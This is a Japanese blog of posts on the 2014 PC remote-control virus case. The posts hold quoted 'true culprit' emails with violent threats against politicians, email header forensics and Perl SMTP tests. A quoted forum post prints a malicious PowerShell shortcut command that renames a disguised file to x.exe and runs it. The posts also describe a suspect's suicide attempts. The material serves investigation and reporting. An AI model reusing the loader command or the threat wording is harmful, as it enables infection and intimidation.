Hatena::ブログ(Diary)

satoru.netの自由帳 このページをアンテナに追加 RSSフィード

180921Friday

[]perlからphpのsession read

いまさらperlつかってるひとなんて化石なんだろうなあとおもいつつーperlだいすき


https://www.h-fj.com/blog/archives/2013/02/27-152952.php

use Data::Dumper

use CGI::Cookie;

use PHP::Serialization qw( unserialize );

my %ck = fetch CGI::Cookie;;

my $data = $memd->get($ck{PHPSESSID}->value);

$data =~ s/^[^\|]+\|//;

my $ref = PHP::Serialization::unserialize($data);

print Dumper($ref);

140601Sunday

[]【安部銃蔵】真犯人の名乗る人物からのまたメール(全文+ヘッダー)

本日、2014年6月1日00:00:30、遠隔操作の「真犯人」と名乗る人物からまたメールが届いた。

※便乗犯、摸倣犯の可能性もあるので、取り扱い要注意。

ヘッダー情報付き(メールのソース)

全文

@タイトル

安倍晋三の心臓に弾丸ぶち込んで自民党本部にロケット砲を撃ち込む自民党員と

アグネスのPCに児ポぶち込む札幌ガスボンベ大爆破霞ヶ関あぼーん唐沢貴洋あ

ぼーん西村博之あぼーん

@日付:

2014年6月1日 00:00:30

@From:

安部銃蔵 <onigoroshijuzo11111011110@yahoo.co.jp>

@To:

省略。前回の真犯人からのメールと同じあて先(25名)。メールの順番も同じ。

@本文

毎度忘れた頃に現れる真犯人でーす

といってこの事件が忘れられた頃にでも現れようかと思っていたのですが

これ以上片山さんを苦しめるのはさすがに気の毒なので特別にお知らせします。

今回片山さんに自作自演を指示し無実を一転させるよう仕向けたのはこの私です。

あらかじめ片山さんのプライバシー情報をゲットしていたので、従わなければ今まで入手したプライバシー情報を全て拡散するなどと言って脅しました。

連絡先や行動パターン等々も把握するのは容易いことでした。

片山氏が保釈後に尾行されているということも当然わかっていたので、これも利用されてもらいました。

あえて見晴らしの良い場所を彼自身に選択させました。彼は河川敷を選んだようですが、なかなかグッドなチョイスでした。

今回のために彼にスマホやPCをこっそり用意させ、onigoroshijuzo2014アカウントを発行させ私が作成した文章をコピペさせて公判中の時間にでもタイマーで送信するようにさせました。

その後は適当に逃げて捕まったら自分が真犯人かのように振る舞い無実を一転させ有罪、というシナリオです。

片山さんが自殺を試みたとの報道がありましたが、生きていてくれてよかったです。

せっかく用意したゲームでプレイヤーに死なれてゲームオーバーになったんじゃ話にならないので。

■どうやって指示したのか?

まず代行者に専用のURLのみ伝えさせました。片山さんに直接渡したのかどうしたかは知りません。監視者等考慮する必要があったので

手段タイミング等は代行者にお任せです

あ。代行者というのは私の共犯というわけではなく、そういう代行業者さんです。

指示内容とメール文はネット上に載せておきました。当然ですが既に削除済みです。

指示文は保存禁止にし、メール用の文章のみ彼の端末にコピペさせました。

ちなみにURLは記憶に残りにくいものにしたのでまず覚えていないでしょう。もちろん海外のサーバーです。

痕跡が残っているはずはありませんが、でもまあ頑張っていろいろ解析してみてください。何か手がかりが掴めるかもしれませんよ^^

片山氏や代行者へはいずれもこちらからの一方的(一方通行)な指示でしたので連絡を取り合うという形はとっていません。

やるかやらないかもあくまで片山氏自身の判断です。でもまあ弱みを握られてるんじゃ流石にせざるを得ませんよね(笑)

■その他

思っていたより順調だったので満足です。やはり高学歴さんはものわかりがいいですね。とても助かりました。

記念すべき5人目ということで人間遠隔操作の特別サプライズです。楽しんでいただけましたか?

今回片山さんはよく頑張ってくれました。

片山さん、佐藤弁護士江川さん、その他片山さんを支えてきた方々ご苦労様でした。大変素晴らしいご活躍でした。

それにしても世間の皆さんひどい手のひらの返しようでしたねぇ。まったくヒドイ世の中ですねー

この遠隔操作事件というゲームは5人目で締めくくろうと思っていますが、今後、警察・検察の行いによってはまた新たな被害者が出るかもしれないのでくれぐれも注意してくださいね。

あ。今回この件について一番面白い報道をしてくれたテレビ局には、ご褒美に特製花火をプレゼントしてあげましょう

■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253

■最後に

もし以上の事を刑務所に入る前に少しでも話してしまったら、片山さんのプライバシー情報全て流出させるように脅してあります。

でももういいです。終わりです。早く片山さんに伝えて楽にしてあげてください。

メールのデータ

PDF

http://yokoku.in/enkaku2012/abejuzo_140601.pdf

@TXT

http://yokoku.in/enkaku2012/abejuzo_140601.txt

@ヘッダー情報付き(メールのソース)

http://yokoku.in/enkaku2012/abejuzo_140601_source.txt

発信元情報など。

メーラー

YahooMailClassic/6.0.18 YahooMailWebService/0.8.111_53

Yahoo!のWebメーラーから送信している。(SMTPではない)

@送信日時

Sun, 01 Jun 2014 00:00:30 JST

ソース

Received: from [192.227.170.19] by web101405.mail.kks.yahoo.co.jp via HTTP; Sun, 01 Jun 2014 00:00:30 JST

X-Mailer: YahooMailClassic/6.0.18 YahooMailWebService/0.8.111_53

X-YMail-JAS: derF9KEVM1lathZJ7nDhFxBOU5DhzIbbOEyyzIRhW6eBav4OFWjzLqt7I_4d_ui6ANFJpfECtwqG4_EgQXOMpdjktjsK37qpUHQaLzApLmFh.PL54LTs8PHfHvCX82tcGSh4

Date: Sun, 1 Jun 2014 00:00:30 +0900 (JST)

@発信IP

192.227.170.19

現時点(2014/6/1)のtor statusによると、torIPの模様。

このIPルーター情報 (192.227.170.19)によるとアメリカtor exitのようだ。

※いずれも2014/06/1 4:30時点のもの

簡単な考察

矛盾点など

その後は適当に逃げて捕まったら自分が真犯人かのように振る舞い無実を一転させ有罪、というシナリオです。

  • 現実には片山氏は「適当に逃げて」おらず、自殺未遂後、自ら弁護士に連絡をした。警察も行動把握していなかった。

片山さんが自殺を試みたとの報道がありましたが、生きていてくれてよかったです。

せっかく用意したゲームでプレイヤーに死なれてゲームオーバーになったんじゃ話にならないので。

  • 「真犯人」の指示で、自作自演で無実を一転させるよう仕向けだけなら、片山氏の自殺未遂の動機は?

メモ

便乗犯、愉快犯
  • メールのあて先さえ入手できれば、第三者でも実現可能。
真犯人・協力者説
  • 従来の「真犯人」メールと時間帯(深夜&土日)の傾向、torを利用している点などは一致。
  • 遠隔操作事件の秘密の暴露などが一切ない為、100%「真犯人」だと確定できない。
片山氏による仕込み、自作自演
  • 片山氏が失踪中に河川敷での行動の言い逃れの為にこのシナリオを考えて、タイマーをセットしてから収監された?
  • Yahoo!Webメールtorを経由して自動送信する事は技術的に可能かどうかの検証が必要。(bot対策などで文字認証などが出てしまう可能性など)
  • 今回のメールの内容には失踪時点で判明している情報だけなので、失踪中に作成する事は実現可能。
  • 河川敷でのタイマー送信、捜査員の追跡、収監、今回のメールまで含めてすべて計画の一環だった?前回のタイマーでの逮捕はこれまでの慎重な真犯人と比較して、あまりにもずさんすぎて納得がいかない。との見方もあった。


関連リンク

真犯人がヒントで示しているスレッド

■おまけ

この前、2ちゃんねるにウイルスを貼ったら踏み台がたくさん集まりました。

なのでまたいつでもゲームを始めることも可能です。

ヒント:poverty1398836253



ウイルスについての指摘(?)と思われる投稿

http://fox.2ch.net/test/read.cgi/poverty/1398876571/35

35 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 02:00:00.83 ID:3I146ai20

>>22

まとめ

rarの中身

 desktop.ini: MS-DOS executable PE for MS Windows (GUI) Intel 80386 32-bit, UPX compressed

 mov.lnk: MS Windows shortcut

 thumbs.db: Macromedia Flash Video

 mov.lnkの内容というかプロパティ

 C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe md 'mov' ;del 'mov.lnk' ;saps mov ;mv thumbs.db mov\mov.flv;sp mov\mov.flv attributes Archive;mv 'desktop.ini' '%temp%\x.exe';saps '%temp%\x.exe';

トラップのシナリオ

 ・解凍したらファイルが3つでてくる。

 ・そのうち「mov」と名前が付いてる、「フォルダのアイコン」をしたショートカットトリガー

 ・こいつをダブルクリックとか「開く」とかやると

   ・desktop.ini を、c:\temp\x.exe という名前にリネーム移動

   ・そいつを実行

アウトとセーフ

 ・解凍しただけならセーフ

 ・というか、mov ショートカットに触ってなければ問題ない

 ・ショートカットダブルクリックとか「開く」とかしたらアウト、シングルクリックは多分大丈夫

 ・XPならそもそも↓こんなものは存在しないのでセーフ。vista/7/8は知らん

   C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe

thumbs.db

 JCJSウェブカメラムービー。ニコ生かなんか?パンツも乳首もない、まあ普通の映像

http://fox.2ch.net/test/read.cgi/poverty/1398876571/529

529 :番組の途中ですがアフィサイトへの転載は禁止です:2014/05/01(木) 03:23:35.26 ID:o7sFdkS+0

トレースしてみたが

これ想像以上にかなり悪質かも知れん。

まず、どっかと通信してるんだけど、

これがおそらく実行ファイル置き場。

今は何も置いてないみたいだから特に害はないが

この置き場に実行ファイルが置かれたら

勝手にPCにダウンロードして勝手に実行するようになってる模様。

さらにレジストリにも同時に書き込みをしており、

手動で消したところで「実行ファイルが消されたら新しい実行ファイルを生成」という

命令が出され、しかもファイル名を変えて実行ファイルが作成される。

vmcサキュラバス関数をいじっており、

相当高難度なプログラムとなってる。

もっと分かりやすく箇条書きすると、

仝什澆里△蕕罎ウイルストフトでは探知出来ない

▲侫.ぅ訝屬場との通信を常に行っており、そこに悪質な実行ファイル置かれたらおしまい

手動で消したところですでに常駐&レジストリいじりをされており、無駄

とりあえず、これから先、「何かされる」可能性が高いので

「今特に何も起こってないからセーフ」とは考えてはいけない。

「何かされる」のを防ぐ方法はある。PCの通信を遮断すること。

これなら現状のウイルスが常駐してようと、「成長」することはない。

情報はスマホやサブのノートPCなどで収集するといい。


記事など

遠隔操作ウイルス事件「真犯人」メールが再び届く 「早く片山さんに伝えて楽にしてあげてください」

2ちゃんねる現行スレ

嫌儲

140520Tueday

[] 「死のうとしたが死に切れなかった」「いち早く裁判を終わらせたかった」「サイコパスは自分」「お母さんを安心させることが今回の動機」

【PC遠隔操作事件 片山被告「私が真犯人」】 5/20 弁護側 記者会見

D

主要な発言まとめ

佐藤弁護士による記者会見の中から重要そうな発言をピックアップ

  • 自分が真犯人と認めた片山被告。自殺を考えた。
  • 真犯人メールを送った理由は「1日も早く平穏な生活を」と片山さんの母の言葉を受け、「いち早く裁判を終わらせたかったから」
  • 今回のメールを前のアカウントで送ろうとしたができなかったので、新しいアカウントをつくった
  • おにごろしじゅうぞう2」のパスワードは犯人しか知らない。
  • スマホが見つかるとは思っていなかった。埋めたスマホログインしていた。埋める直前にアクセスした
    • ※このアクセスが前回の真犯人との繋がりのある決定的な証拠になり、言い逃れができないと思い、自供をするに至った。
  • 以前『真犯人はサイコパスだ』と片山さんは言っていたが、今回彼は『自分がそうなんです』と言っていた
  • 真相は、別にパソコンを持っていた。スマホを持っていた。
  • 私以外の弁護士(佐藤弁護士以外)にonigoroshijuzoからのメール送信をしてくれないか、と持ちかけたが断られたので、自分でやった。>55:24-
  • タイマー送信のトリックは、本来は有罪判決が出た時にやろうと考えていた。しかし、母親の事を考えて前倒しにした。
  • お母さんを安心させることが今回の動機だった。
  • 15日、河川敷には自転車を使って、バスで移動した。見晴らしもよく、河川敷に埋めるところを捜査員に見られているとは思わなかった。
    • 本を読んでいる人がいたが、自分が着く前に居たので捜査員とは思わなかった。
  • 河川敷には下見に2-3回行っていた。(←それで、元々捜査員に怪しまれていた?)
  • スマホの入手先。プリペイド式のSIMカード。身分証不要で購入できた。秋葉で入手した。送信は予約ソフトを使って送信した。ソフト名は不明。
  • もう一台のパソコンはどこかに隠しているが、パスワードを忘れてしまって開けない
  • 落合さんのところに届いたハードディスクは、『自分とは関係ない』と言ってる
  • アイシスを作るぐらいの能力はあった。Windowsで動くということでC#にした。自宅&会社で開発。自宅PCは再インストールで証拠隠滅。
  • 4人の誤認逮捕に「やった!と思った」
  • 河川敷には2、3度下見をして、安全な場所だと思っていた
  • 高尾山の近くの駅(山田駅?)に行っていた。そこで首を吊ろうと。保釈後に高尾山には登っていた
  • その前にはどこか(亀戸?)の公園にいて、そこまでは自転車で移動していた。
  • そこから高尾山に向かった。今朝、新宿のホテルで彼に会った


昨日(片山被告の失踪)〜今日までの時系列・経過

昨日(19日)の行動

(公園で自殺失敗→高尾山で自殺失敗→山田駅で自殺失敗→弁護士に連絡→説得されて新宿ホテルへ)

  • 10時22分、保釈請求取り消しが検討されている件を弁護士から片山氏に伝えられた。
  • 午前12時すぎ、片山氏は事務所に向かう途中だったが「河川敷の事が知られたらもうだめだ」とパニックに陥った。
  • 事務所に行くのを中止し。行く果てもなく着いた先が都内の公園だった。
  • 公園で自殺を図るも死にきれなかったので、どこかで首をつろうと思い高尾山に向かった。
  • 山中を缶チューハイを飲みながら放浪。ベルトで首を吊ろうとしたが切れた。
  • ネクタイを買ったり、新しいベルトを買って試したが死に切れなかったので下山した。
  • 駅(山田駅?)のホームの下の退避スペースに隠れて、電車に飛び込もうと何度も試みた。
  • 駅で佐藤弁護士に詫びの電話をした。「先生すみません。自分が犯人でした。全部、自分がやったんです」と弁護士に話した。
    • ※朝の10:22からこの時点まで音信普通状態だった。弁護士は帰宅途中だった。
  • 片山被告は佐藤弁護士に説得され、自殺をやめた。
  • 「とにかく東京に戻って来い」と弁護士に指示をされ、電車で新宿に向かった。
  • 新宿に近づき、「そろそろ切ります」と告げ、一旦その場では電話を切った。
  • 佐藤弁護士は「また明日」と告げ一旦は電話を切った後、電話をかけ直したが電源が切れた状態で繋がらなかった
20日の行動

(新宿ホテルで弁護士と合流→弁護士事務所へ→検察に連絡→検察が来て身柄拘束される→拘置所)

その他めも

  • プリペイド式の携帯
    • 秋葉で購入。購入時期、自販機か店頭購入か等の詳細は「分からない」。
  • なぜ埋めたか?
    • 裁判中である事のアリバイの為。
    • 発信の基地局を別の場所にしないといけなかったから。回収は考えていなかった。
  • 今回のメールを考えた時期は?
    • 1ヶ月かけて考えた。保釈する前から考えていた。
  • ひみつのパソコンの入手先
    • 文章はひみつのパソコンでつくった。SDカードでコピーをとって、スマホに記録。自宅以外の場所に隠していた。当分使うつもりがなかったので、パスワードを忘れて開けない。
  • 保釈金1000万円は?
    • 証拠隠滅を図ったのでおそらく没収になる。彼は悔いていた。
  • 逃走時の所持金は?
    • 病院にいくつもりだったのでお金をもっていた。その後、ATMでおろした。
  • 雲取山の画像は映像を編集して画像化した。playsportを使った。
  • 江ノ島の監視カメラに移った前後の複数人の人の真相は?
    • 「たまたま」映っただけだった。と打ち明けられた。

関連記事/リンク

書き起こしまとめ記事(itmedia)
テレビの報道

D D D D D

主要メディア

その他・関連記事

 「真犯人」のメールには、タイトルに天皇、皇后両陛下やキャロライン・ケネディ駐日米大使らの殺害予告が書かれていた。東京地検と警視庁は19日夜、脅迫容疑で、容疑者を特定せずに東京都江東区の片山祐輔被告の自宅を捜索。メール送信の裏付けを急ぎ、立件へ詰めの捜査を進める。

警視庁の捜査員はメールが届く前日の15日午後、片山被告が東京都江戸川区の荒川河川敷で何かを埋めているのを確認。翌日、報道機関にメールが届いた後に現場を調べたところ、袋に入った携帯電話を発見した。同庁捜査支援分析センターが総力を挙げて短期間で携帯電話を解析し、「真犯人」を名乗るメールが送信されていたことを突き止めた。..

一転して事件への関与を認めたことで、東京地裁で続く公判の争点は量刑に絞られ、動機の解明が最大のポイントとなる。片山被告は捜査当局の取り調べに応じる方針で、新たな事実が判明すれば検察側が訴因変更する可能性もある。

『真犯人』からの新たなメール〜自供までのおさらい


2ちゃんねる関連スレ

ニュース速報/【社会】遠隔操作事件 片山被告「私が真犯人」と認める★1〜
嫌儲/片山祐輔が真犯人で決着 今まで擁護してた連中を絶対に許すな★1〜
嫌儲/【遠隔操作事件】真犯人「小保方銃蔵」からの秘密暴露メールが公開される ★16-

[] HDDの件、送り主が光臨→追跡番号で自己証明。『中身は単なるTV録画』

『ハードディスクの送り主』と名乗る人物が2ちゃんねる(ニュー速)に光臨

スレ:http://hayabusa3.2ch.net/test/read.cgi/news/1400487418/208

208 : ショルダーアームブリーカー(大阪府)@転載禁止:2014/05/20(火) 00:52:32.58 ID:hTU5O1Np0

ハードディスクの送り主です DLパス 123

http://tikuwa.net/f/10376.mp4.html

中身は単なるTV録画です

偏向報道確認の為のプレゼントです。

特定作業をヤメテ下さい

暗くなってから騒ぎに気付いて

弁護士事務所に電話しても繋がらないし

神奈川県警に電話しても、なんかの受付が終わってるから担当に繋がらないし

※その他の発言などは必死チェッカーを参照。

自己証明方法

落合弁護士に届いた荷物と同じ追跡番号の控えを動画で証明↓

光臨した送り主の動画 (http://tikuwa.net/f/10376.mp4.html パスワード:123)

落合弁護士の追跡番号 (元動画:http://iwj.co.jp/wj/open/archives/140773)

捏造は可能か?

落合弁護士が動画を公開した後に、主が光臨しているので捏造(同じ追跡番号を印字する)事は可能。

ただ、雰囲気からして本物・・・・だと思う。(ただの直感)

関連スレ



※この記事はコメ欄の情報を元に作成しました。

貴重な情報提供ありがとうございました!!

140519Monday

[]『片山被告 スマホ埋めて自ら送信か』報道とメール検証結果の一致部分まとめ

報道内容と検証結果と完全一致する部分のまとめ

報道内容まとめ

引用元:「真犯人」メール、片山被告が自ら送信か(日本テレビ) (魚拓)

しかし、捜査関係者によると、片山被告が16日の裁判よりも前に、都内の河川敷で不審な行動をとっているのが捜査員に目撃され、片山被告がいた場所にスマートフォンが埋められているのが見つかったという。さらに、このスマートフォンを解析したところ、真犯人を名乗るメールのアドレスの痕跡があったという。時間をずらしてメールを送信するタイマー機能を使うなどして、片山被告自身が、真犯人を装うメールを送ったとみられている。
 こうした事態を受けて、東京地検は片山被告の保釈の取り消しを裁判所に対して求めることを検討している。
引用元:遠隔操作ウイルス事件 真犯人メール、片山被告本人か タイマーで偽装の疑い(日本経済新聞) (魚拓)
捜査関係者によると、メールが届いたのは16日午前11時半すぎで、片山被告は東京地裁での公判に出廷していた。捜査当局は、片山被告が15日夕に東京都江戸川区内の河川敷で不審な行動をしているのを確認。土の中にスマートフォン(高機能携帯電話)が埋められており、メールを送信した痕跡が残されていた。

 捜査当局は、片山被告が決められた時間に自動でメールを送信する「タイマー機能」を使い、偽装工作を図ったとみて裏付けを進めている。
PC遠隔操作 河川敷で発見のスマートフォンから被告のDNA(魚拓)
いわゆるPC遠隔操作事件が、思わぬ展開を見せている。「真犯人」を名乗るメールは、被告による自作自演の疑いが浮上している。河川敷から見つかったスマートフォンから、被告のDNAが検出されたことが、新たにわかった。

関連報道

メモ

  • 今回の警察発表により「5月16日のonigoroshi2014」のメールを遠隔操作真犯人からのメールだと認めたことになる。
    • 警察発表で、「真犯人からのメールが片山氏(容疑者)が送ったとして、保釈取り消し請求している」為
  • 捜査関係者は発見時(15日時点)で、すぐに掘り出した?どのタイミングで掘り起こした?
    • 発見時点(メール送信前)に掘ると、片山氏に気づかれる危険性もあるが、そんなリスクを冒すのか疑問
  • タイマーがセットされてることを把握したのは、掘り起こして分析した後?
  • 仮に掘り起こしてスマホが移動されていれば、IPの基地局は別の場所になる可能性がある。
  • メール配信後、片山氏は回収に向かった?
    • 向かったとすれば、16日以降どの時点で掘り返されている事に気づいた?
  • スマホの入手経路は?
    • 自ら購入した?盗んだ?協力者が居た?
  • メール到着後の会見中に記者が「スマホはもっていますか?」と質問していた>会見の動画
  • 片山氏が埋めていたのが事実だとすると、浮上する疑問店
    • なぜわざわざ河川に埋めたのか?という疑問が残る。
      • メール配信元のIPの基地局が片山氏の関係する場所じゃないことで、第三者の仕業だと偽装する目的があった?
      • 真犯人を装って新たなクイズにしようと思った?
    • メールを送る動機は?
      • 裁判は有利に進んでいたのに、なぜわざわざ不利になるようなメールを送った?
      • わかり安すぎるmessage-id。その他、今回のメールは不審な点が多いことから、警察による証拠捏造説疑惑も考慮すべき。
      • 現時点での情報はすべて警察主導のリーク情報なので、鵜呑みにするのは危険。←重要
  • なぜわざわざYahoo!メール&SMTP&和製IPを選んだのか?
    • ノーマークのAndroid&回線があれば、torブラウザからwebメールを使い真犯人を装う事は実現可能。
    • torを使えば見つからなかったのにあえて特定されやすい回線、第三者に掘り起こされる場所を選んだ理由は?
  • 片山氏自身が今回の真犯人メールを作ったとなると、捜査関係者も把握していない何らかのストレージ(今までのパターンだとdropboxとか?)が存在する事になる
    • メール本文にある過去の犯行予告などを一字一句、記憶だけで再現したり、前回とおなじあて先に送信するのは難しい為。

関連メモ

『刑事法』…保釈取り消し関連部分
刑事法
刑事法 第九十六条
裁判所は、左の各号の一にあたる場合には、検察官の請求により、又は職権で、
決定を以て保釈又は勾留の執行停止を取り消すことができる。
一  被告人が、召喚を受け正当な理由がなく出頭しないとき。
二  被告人が逃亡し又は逃亡すると疑うに足りる相当な理由があるとき。
三  被告人が罪証を隠滅し又は罪証を隠滅すると疑うに足りる相当な理由があるとき。
四  被告人が、被害者その他事件の審判に必要な知識を有すると認められる者若しくはその親族の身体若しくは財産に害を加え若しくは加えようとし、又はこれらの者を畏怖させる行為をしたとき。
五  被告人が住居の制限その他裁判所の定めた条件に違反したとき。
→今回は、二&三あたりが怪しい。。

2ちゃんねる関連スレ

【速報】「真犯人」メール ゆうちゃん、河川敷にスマホを埋め自作自演&失踪
【PC遠隔操作】 片山被告、自らメール送信か 河川敷でスマホ埋める不審な行動捜査員が目撃★1〜
【PC遠隔操作】片山被告が会見に姿見せず 弁護士「(メール自作自演は)ないと信じている」

140516Friday

[]遠隔操作の真犯人(と名乗る)人物からのメールが今回も来てた件

よく見たらメールきてたー。本文に関しては既出ですが、真犯人らしき人物からのメール本文&ヘッダを公開します。

また、メールのヘッダー情報などを元に自分なりの分析をしてみました。

目次

※なお、警視庁合同捜査本部には全ての内容はすでに情報提供済みです。

※このブログで公開している、画像・記事はすべて自由に転載・引用してくださって構いません。(許可や報告も不要です)

※今回のメールの題名など犯行予告が含まれる文言について転載する場合は、固有名称などを伏せるなど取り扱い注意。

■『小保方銃蔵』からのメール本文&ヘッダー

※送付先のメールアドレスは伏せてます。

■過去のメールまとめ(ヘッダ+本文)

■送信元メールアドレス onigoroshijuzo2014@yahoo.co.jp。現在はすでに削除済み。

onigoroshijuzo2014アカウントは2014/5/16 22:43現在、すでに削除済みの模様。

(※『2014/5/15 22:43』と誤植していました。ご指摘により修正しました。)

http://profiles.yahoo.co.jp/onigoroshijuzo2014

※17:37頃はメールは生きていた?

ジャーナリストの江川さんが2014年5月16日 17:37に真犯人に質問メールを送ってるようだ。

通常、削除されていれば、エラーメールが帰ってくるので、

ツイートした時点でエラーメールが帰ってきてないなら、この時点ではまだ消えてなかった可能性もある。


■メールの送信先一覧は前回と全く同じ25名(※ただし情報は過去に流出した可能性あり)

前回の2013年1月1日〜2013年1月5日に送られたあて先とまったく同じあて先。

追加も削除もなし。全25名。

今のところ、受信を表明している人リスト

※この25名のあて先は、真犯人の使っていたヤフーアカウントが不正ログインしやすい状況にあった事から、

あて先以外の第三者にもすでに流出している可能性がある。

よって「あて先25名を知っている事」は「真犯人である証明」にはならない。

参考リンク:記者が遠隔操作真犯人アカウントに不正ログインしていた履歴が公開される


■メールの送信日時が今回は夜型じゃない点

今回のメールの日時は 2014年5月16日 11:37でかなりの朝方になっている。

従来の鬼殺し重蔵からのメールはいずれも、夜型だった。

片山氏の会見では「公判の時間に、犯人がわざとアリバイのために送ってくれたのか?」のような趣旨の事をいっている点も注目したい。


■メール送信元 mp76f1fa5d.ap.nuro.jp(118.241.250.93)。踏み台?新たな被害者?

メールヘッダーのReceived:を抜粋。

Received: from unknown (HELO ?100.64.5.244?) (118.241.250.93 with plain)
  by smtp501.mail.kks.yahoo.co.jp with SMTP; 16 May 2014 02:40:36 -0000
X-YMail-JAS: 4silEm4VM1kSFXt3dSl.ptLc3GwanD4qjE8i_wMNhhDttjamyjG0_FsQ3_RFGxUhcRDcTQVIf3HQglEVWFZcbcwL.KMIwR2JVGICrTBVnwLnAyVM7psVMpPQWtGcp1Rbww--

ホスト名は mp76f1fa5d.ap.nuro.jp

so-net系列のプロバイダ

http://www.nuro.jp/

inetnum: 118.240.0.0 - 118.241.255.255 
netname: So-net 
descr: So-net Corporation 
descr: 2-1-1, Osaki, Shinagawa-ku, Tokyo 141-6010, Japan 
country: JP 
admin-c: JNIC1-AP 
tech-c: JNIC1-AP 
status: ALLOCATED PORTABLE 

前回、前々回はtor IPからだった。

今回は日本のプロバイダである為、発信元の特定が可能。

真犯人による踏み台、遠隔操作された新たな被害者のIPの可能性はある。

※1/5のRecieved→tor29.anonymizer.ccc.de(77.244.254.229)

http://d.hatena.ne.jp/satoru_net/20130105/1357318665

※1/1のRecieved→63.141.201.75(63.141.201.75-63.141.201.75 Tor Exit Node)

http://d.hatena.ne.jp/satoru_net/20130101/1356985472

何らかの理由でtorIPが使われず、国内IPを経由した理由はなんだろう。?

■今回はWebMailじゃなく、SMTPから送信されている可能性

メールヘッダーをみると、今回のメールのみ「X-Mailer:YahooMailClassic」のヘッダーがない。

http://yokoku.in/enkaku2012/mail20140516.txt

つまり、従来はブラウザ上からヤフーアカウントログインしてWebメーラーからメールが送られていたが、

今回のみSMTPを使って外部のメーラーソフトや外部サーバから送信されている可能性がある。

そのほかにも、本文がbase64でエンコードされているなど、メールのソースレベルだと前回と異なる点が多い。

SMTPからの送信であれば、タイマーによる送信や、何らかの自動化された送信も実現可能

今回分
前回分
参考リンク

■検証:Yahoo!SMTPから送信してみると、今回のヘッダーにほぼ一致するものが作成できた

SMTPを使って外部サーバからメールを送ってみた。

(検証用の自身のYahoo!アカウントenkaku_debug_2014@yahoo.co.jpからyano@satoru.net宛に送信)

結果、今回の真犯人のメールのヘッダーとほぼ同じものが出来た。

(特徴:WebMailerにはついていない X-Yahoo-Newman-Property、X-Yahoo-Newman-Id等のヘッダーが自動的に付与される。)

今回は、何らかの理由でWebメールを使わず、SMTPで送信をしたのはほぼ確定。

なお、前回のものと比較すると、ソースがぜんぜん違う。

前回分
検証用の外部SMTPメーラーのソース

ちなみに作ったメーラーのソースはこんな感じ。(perlのメール送信プログラム。パスワードのみ伏せてます。)

enkaku_debug_2014@yahoo.co.jpというyahooのメールアドレスからyano@satoru.net宛にメールを送るプログラム

外部サーバでプログラムを実行しさせすれば、いつでも送信ができるので、スケジュールによるタイマー送信や、

自動化された送信なども可能。smtp通信のプログラム自体もすごく単純なものなので、

smtp関連はウイルスなどで仕込まれてる事がよくある。


ちなみに、Webメーラーを自動化して送信する場合、場合によってはタイムアウトでパスワード入力の再認証を求められたり、

外部サーバから偽装ブラウザでプログラムなどから操作した場合、スパム対策などで、画像認証をもとめられる場合がある。

この場合、人為的な目視での対応が必要になり、送信に失敗してしまう可能性がある。

■検証:Recieved (118.241.250.93 with plain)の"plain"の意味

メール送信をする場合の認証方法には、POP Before SMTP、plain、Login CRAM-MD5等がある。

(それぞれの具体的な仕様はぐぐってみてね。)

今回のメールのSMTP認証は"plain"が使われていた。

"plain"はIDとパスワードをEncodeした値をメールサーバに渡す認証方法。

簡易的な認証なのでコードも短くて済むのが特徴。

実験的に実際にplain認証でメールを送るプログラムperlで作ってみた。

ソース:http://yokoku.in/enkaku2012/smtp_plain_ver_perl.txt

届いたメールはこれ。

http://yokoku.in/enkaku2012/smtp_plain_ver_mail.txt

結果的に、真犯人のメールとほぼ同様のメールヘッダーが再現できた。




■検証:メールヘッダーのrecievedの謎のIP『HELO ?100.64.5.244?』について

http://yokoku.in/enkaku2012/mail20140516.txt

Received: from unknown (HELO ?100.64.5.244?) (118.241.250.93 with plain)

上記のログの意味は、

  • 発信元のIP "118.241.250.93"
  • SMTP認証方法は "plain方式"(他にPOP Before SMTP、plain、Login CRAM-MD5等がある)
  • 自身のドメイン(FQDN)を"?100.64.5.244?"と指定した

というログを読み取れる。

"118.241.250.93"のIPを逆引きすると、"mp76f1fa5d.ap.nuro.jp"になる。

この部分は、SMTPのサーバに接続時にYahoo!側が付与するので、接続元IPは偽証はできない。

『(Helo ?100.64.5.244?)』の値は偽証できるのか検証

メールの送信時にHeloの部分はメールサーバとの通信時に自身のメールサーバのドメインを伝える手段で任意の文字列を指定できる。

たとえば、

my $smtp = Net::SMTP->new('smtp.mail.yahoo.co.jp', Port => 587, Hello=>"?100.64.5.244?", Debug=>1);|

と指定すると、今回の真犯人メールと同じ HELOになるメールヘッダーが実現できた。

ソース:(ResievedのHELO が ?100.64.5.244?)

HELOの指定を省略した場合は、サーバのhostsで設定している自身のホスト名が使用される。

ソース:(ResievedのHELO が localhost.localdomain)

ちなみに"100.64.5.244"のIPアメリカ・ロサンゼルスに所属するIPのようだ。

http://www.topwebhosts.org/whois/index.php?query=100.64.5.244

HELOの指定自体は任意のものなので、メールとの関連性は不明。

真犯人が指定し忘れた?Proxy通し忘れた?過去に指定していたtorのホスト?いろんな可能性はありそう。

HELOに指定されたIPにはどういう意図があったのか疑問が残る。

■追記■IP:100.64.5.244はISP Shared Address(プロバイダー共用)

今回のIP 100.64.5.244 は 127.0.0.1のような、プライベートIPに近いもので、

ISP Shared Address(100.64.0.0/10)と言われるサービスプロバイダが共用するグローバルIPのようだ。

(※読者さんから、ご指摘いただきましたので、追記しました。感謝)

■追記■

SMTP認証について、(with login)ではなく(with plain)にする検証も下記で行いました。

http://d.hatena.ne.jp/satoru_net/20140516/1400248579#webmail2_2

秘密の暴露の2番目「部落解放同盟」の内容は秘密の暴露になってない

理由は真犯人による1回目のメール(2012/10/10)にエキサイトのアカウント情報が報道で公開されていた。

結果、第三者でもエキサイトIDでログインすれば送信履歴等から知ることは可能だった。

参考:(記事でID&パスワードが公開されてた)

http://megalodon.jp/2013-0503-2006-48/www.iza.ne.jp/news/newsarticle/event/crime/602253/

事実として、当時、その報道アカウントからヒントを得た新聞記者が

真犯人のヤフーアカウント(※エキサイトではない)などにも不正ログインして広く報道されていた。

参考:http://d.hatena.ne.jp/satoru_net/20130412/1365773143

ヤフーに不正ログインされるくらいなので、ID&パスワードが公開されていたエキサイトにも同様の

不正ログインが行われていた可能性は十分にある。

参考リンク:記者が遠隔操作真犯人アカウントに不正ログインしていた履歴が公開される


